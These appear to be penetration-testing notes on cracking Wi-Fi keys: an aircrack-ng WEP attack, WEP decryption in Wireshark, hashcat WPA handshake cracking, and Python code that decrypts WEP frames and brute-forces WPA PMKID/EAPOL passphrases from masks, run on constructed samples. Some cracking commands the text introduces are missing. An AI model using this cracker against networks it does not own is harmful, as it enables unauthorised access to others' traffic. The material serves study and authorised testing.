
Aircrack-ng

Aircrack-ng WEP Attack

  • understand your pcap first (capinfos reports the link-layer type, packet count and duration) before handing it to aircrack-ng

capinfos wep.pcap
aircrack-ng wep.pcap
  • aircrack-ng lists the networks seen in the capture and prompts you to pick the target BSSID; it then runs its statistical attack (PTW by default) over the IVs collected for that network. The attack is entirely offline, so a failed run simply means the capture does not hold enough unique IVs yet

  • if the attack succeeds the key is printed as colon-separated hex; a 13-byte key like the one below is a 104-bit key (marketed as WEP-128)

E1:26:9E:0F:19:4A:A7:2A:9D:32:53:53:52

Decrypting the WEP Capture in Wireshark

  • with key in hand go to: Edit | Preferences

  • Expand the Protocols tree, then scroll to and select IEEE 802.11

  • Make sure the Ignore the Protection bit option is set to No (otherwise Wireshark treats the protected frames as if they were plaintext and never tries to decrypt them)

  • Make sure Enable decryption is selected

  • To specify a key to use in decryption, click the Edit... button to open the WEP and WPA Decryption Keys dialog

  • add your key with the + button: key type wep, value in hex (the colon-separated form aircrack-ng prints is accepted as-is)

  • Hit Ok twice and your packets will be decrypted
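What Wireshark does with that key, shown as an added example that is not part of these notes or of the Aircrack-ng and Wireshark projects: a WEP frame body is IV || key-id byte || RC4(IV || key, plaintext || CRC-32 ICV), so decryption means rebuilding the RC4 seed from the frame's own IV, stripping the 4-byte header and checking that the trailing ICV still matches. The 13-byte key is the one printed above; the IV, the payload and therefore the frame body are constructed for this example, not taken from a capture.

```python
"""Decrypt a WEP data-frame body with a recovered key (what Wireshark does after Enable decryption)."""
import struct
import zlib


def rc4(key, data):
    """RC4: key scheduling, then XOR the keystream over data. WEP seeds it with IV || key."""
    s = list(range(256))
    j = 0
    for i in range(256):                       # KSA
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out, i, j = bytearray(), 0, 0
    for byte in data:                          # PRGA
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def wep_key_from_hex(text):
    """Accept aircrack-ng's colon-separated output or plain hex; only 40- and 104-bit keys here."""
    key = bytes.fromhex(text.replace(":", ""))
    if len(key) not in (5, 13):
        raise ValueError(f"unexpected WEP key length {len(key)} bytes")
    return key


def wep_encrypt(key, iv, plaintext, key_id=0):
    """Frame body = IV(3) | key-id byte (id in the top 2 bits) | RC4(IV||key, plaintext || CRC-32 ICV)."""
    icv = struct.pack("<I", zlib.crc32(plaintext) & 0xFFFFFFFF)
    return iv + bytes([(key_id & 3) << 6]) + rc4(iv + key, plaintext + icv)


def wep_decrypt(key, body):
    """Reverse of wep_encrypt; returns None when the ICV does not match (wrong key or corrupt frame)."""
    if len(body) < 8:                          # IV + key-id byte + at least the 4-byte ICV
        return None
    iv = body[:3]
    decrypted = rc4(iv + key, body[4:])
    plaintext, icv = decrypted[:-4], decrypted[-4:]
    if struct.pack("<I", zlib.crc32(plaintext) & 0xFFFFFFFF) != icv:
        return None
    return plaintext


# Key from the aircrack-ng output above; IV and payload are constructed for this example
KEY = wep_key_from_hex("E1:26:9E:0F:19:4A:A7:2A:9D:32:53:53:52")
IV = bytes.fromhex("0a0b0c")
# A decrypted data frame starts with the LLC/SNAP header aa aa 03 00 00 00 and an EtherType (0x0800 = IP)
PLAINTEXT = bytes.fromhex("aaaa030000000800") + b"\x45\x00" + b"constructed IP payload"
FRAME_BODY = wep_encrypt(KEY, IV, PLAINTEXT)

if __name__ == "__main__":
    print(wep_decrypt(KEY, FRAME_BODY)[:8].hex())       # aaaa030000000800
    print(wep_decrypt(bytes(13), FRAME_BODY))            # None: ICV check fails with the wrong key
```

The fixed LLC/SNAP prefix is the known plaintext aircrack-ng's PTW attack leans on to recover the key from many IVs, and because the ICV is a plain CRC-32 (linear), a matching ICV only rules out accidental corruption: an attacker can flip ciphertext bits and fix up the ICV to match.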

Four-Way Handshake Cracking

  • Filter for the handshake frames in Wireshark with the display filter eapol (all four messages are EAPOL-Key frames)

  • If you captured the four-way handshake it can be cracked with

  • if that fails because the password is not in the wordlist, you can easily add permutations of the wordlist entries (rule-based mangling) instead of relying on the plain list

hcxpcapngtool for Hashcat

  • before using hashcat to crack a handshake, convert the capture to hashcat's 22000 format with hcxpcapngtool

  • examining the output file

  • only one handshake was captured, yet the file holds two hashes

  • the first is the PMKID and the second is the four-way handshake hash

  • Note: hcxpcapngtool writes the PMKID line whenever the AP put a PMKID field into message 1, even when the AP does not actually support PMKID caching; such a value is not derived from the PMK, so hashcat will never crack that line no matter how good the wordlist is. When only the PMKID line refuses to crack, that is the reason.

  • the PMKID hash can be filtered out of the file (it is the WPA*01 line; the four-way handshake hash is the WPA*02 line) so hashcat only spends time on the crackable hash

Hashcat Mask Attack

  • Many vendor and ISP default passphrases follow a fixed pattern (fixed length, digits only, a known prefix); instead of a wordlist, save yourself the time with a mask attack that enumerates only that pattern

  • -m 22000 is hashcat's WPA-PBKDF2-PMKID+EAPOL mode for WPA/WPA2-PSK; it accepts both the PMKID and the four-way handshake lines from the same file
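Pulling the handshake, hcxpcapngtool and mask sections together, here is an added example that is not part of these notes, of hcxtools or of hashcat: a small Python re-implementation of what hashcat -m 22000 does with the two line types hcxpcapngtool writes. It derives PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 rounds), then recomputes either the PMKID (WPA*01 line) or the message-2 MIC through the PTK's KCK (WPA*02 line), trying candidates from a hashcat-style mask. The SSID, MACs, nonces, passphrase and both hash lines are constructed from a known passphrase rather than taken from a capture; the code assumes the EAPOL field holds the client's message 2 (the usual M1/M2 pair), and the bogus PMKID line stands in for an AP whose PMKID is not derived from the PMK, which is why that line never cracks while the EAPOL line does.

```python
"""Mini hashcat -m 22000: crack a PMKID (WPA*01) or EAPOL-MIC (WPA*02) line."""
import hashlib
import hmac
import itertools
import struct

# hashcat mask charsets understood by mask_candidates(); any other character is a literal
CHARSETS = {"d": "0123456789", "l": "abcdefghijklmnopqrstuvwxyz",
            "u": "ABCDEFGHIJKLMNOPQRSTUVWXYZ", "h": "0123456789abcdef"}


def mask_candidates(mask):
    """Expand a hashcat-style mask such as 'Home20?d?d' into every candidate passphrase."""
    slots, i = [], 0
    while i < len(mask):
        if mask[i] == "?" and i + 1 < len(mask) and mask[i + 1] in CHARSETS:
            slots.append(CHARSETS[mask[i + 1]])
            i += 2
        else:
            slots.append(mask[i])
            i += 1
    for combo in itertools.product(*slots):
        yield "".join(combo)


def pmk(passphrase, ssid):
    """802.11i PSK -> PMK: PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 rounds, 32 bytes)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid, 4096, 32)


def pmkid(pmk_, ap, sta):
    """PMKID = HMAC-SHA1-128(PMK, "PMK Name" || AA || SPA), sent by the AP in message 1."""
    return hmac.new(pmk_, b"PMK Name" + ap + sta, hashlib.sha1).digest()[:16]


def kck(pmk_, ap, sta, anonce, snonce):
    """First 128 bits of PTK = PRF-512(PMK, "Pairwise key expansion", min/max MACs || min/max nonces)."""
    data = min(ap, sta) + max(ap, sta) + min(anonce, snonce) + max(anonce, snonce)
    ptk = b"".join(hmac.new(pmk_, b"Pairwise key expansion\x00" + data + bytes([i]),
                            hashlib.sha1).digest() for i in range(4))
    return ptk[:16]


def eapol_mic(kck_, eapol):
    """MIC over the EAPOL-Key frame with its MIC field (bytes 81..96) zeroed."""
    zeroed = eapol[:81] + bytes(16) + eapol[97:]
    keyver = struct.unpack(">H", eapol[5:7])[0] & 0x7   # key descriptor version from Key Information
    if keyver == 1:                                      # WPA/TKIP: HMAC-MD5
        return hmac.new(kck_, zeroed, hashlib.md5).digest()
    if keyver == 2:                                      # WPA2/CCMP: HMAC-SHA1-128
        return hmac.new(kck_, zeroed, hashlib.sha1).digest()[:16]
    raise ValueError(f"unsupported key descriptor version {keyver}")


def parse_22000(line):
    """WPA*TYPE*PMKID-or-MIC*MAC_AP*MAC_STA*ESSID_HEX*ANONCE*EAPOL*MESSAGEPAIR (TYPE 01 = PMKID, 02 = EAPOL)."""
    f = line.strip().split("*")
    if len(f) != 9 or f[0] != "WPA" or f[1] not in ("01", "02"):
        raise ValueError("not a hashcat 22000 line")
    return {"type": f[1], "hash": bytes.fromhex(f[2]), "ap": bytes.fromhex(f[3]),
            "sta": bytes.fromhex(f[4]), "ssid": bytes.fromhex(f[5]),
            "anonce": bytes.fromhex(f[6]) if f[6] else None,
            "eapol": bytes.fromhex(f[7]) if f[7] else None}


def crack(line, candidates):
    """Return the candidate that reproduces the line's PMKID or MIC, or None if none does."""
    h = parse_22000(line)
    for pw in candidates:
        if not 8 <= len(pw) <= 63:           # WPA passphrase length rule: skip impossible words
            continue
        p = pmk(pw, h["ssid"])
        if h["type"] == "01":
            ok = pmkid(p, h["ap"], h["sta"]) == h["hash"]
        else:                                # assumption: EAPOL is the client's message 2 (SNonce inside)
            snonce = h["eapol"][17:49]
            ok = eapol_mic(kck(p, h["ap"], h["sta"], h["anonce"], snonce), h["eapol"]) == h["hash"]
        if ok:
            return pw
    return None


# Constructed sample handshake (not a real capture): SSID HomeNet, passphrase Home2024
AP, STA, SSID = bytes.fromhex("001122334455"), bytes.fromhex("66778899aabb"), b"HomeNet"
ANONCE, SNONCE = bytes(range(32)), bytes(range(32, 64))


def build_sample_lines(passphrase="Home2024"):
    """Build one WPA*02 line and one WPA*01 line for this exchange, in hcxpcapngtool's layout."""
    body = (bytes([2]) + struct.pack(">HH", 0x010A, 0) + struct.pack(">Q", 1)   # RSN, version 2, pairwise + MIC
            + SNONCE + bytes(16) + bytes(8) + bytes(8) + bytes(16) + struct.pack(">H", 0))
    eapol = bytes([2, 3]) + struct.pack(">H", len(body)) + body                # EAPOL-Key frame, MIC zeroed
    p = pmk(passphrase, SSID)
    mic = eapol_mic(kck(p, AP, STA, ANONCE, SNONCE), eapol)
    m2_line = f"WPA*02*{mic.hex()}*{AP.hex()}*{STA.hex()}*{SSID.hex()}*{ANONCE.hex()}*{eapol.hex()}*00"
    pmkid_line = f"WPA*01*{pmkid(p, AP, STA).hex()}*{AP.hex()}*{STA.hex()}*{SSID.hex()}***"
    return m2_line, pmkid_line


# Constructed PMKID the AP did not derive from the PMK: this line never cracks, the EAPOL line does
BOGUS_PMKID_LINE = f"WPA*01*{'1337' * 8}*{AP.hex()}*{STA.hex()}*{SSID.hex()}***"

if __name__ == "__main__":
    m2_line, good_pmkid_line = build_sample_lines()
    print(crack(m2_line, mask_candidates("Home20?d?d")))            # Home2024
    print(crack(BOGUS_PMKID_LINE, mask_candidates("Home20?d?d")))   # None
```

crack() takes any iterable, so a rules-mangled wordlist plugs in exactly like the mask generator; the cost per candidate is dominated by the 4096-round PBKDF2, which is why shrinking the candidate space with a mask matters far more than speeding up the MIC check.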
